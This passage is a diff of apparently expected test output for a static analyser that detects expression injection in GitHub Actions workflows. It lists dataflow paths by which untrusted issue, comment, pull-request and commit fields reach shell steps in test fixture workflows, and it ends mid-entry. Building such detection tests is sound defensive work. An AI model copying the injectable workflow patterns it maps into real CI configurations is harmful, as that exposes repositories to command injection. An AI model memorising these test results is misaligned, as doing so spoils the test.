.github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/test.yml:26:19:26:46 | 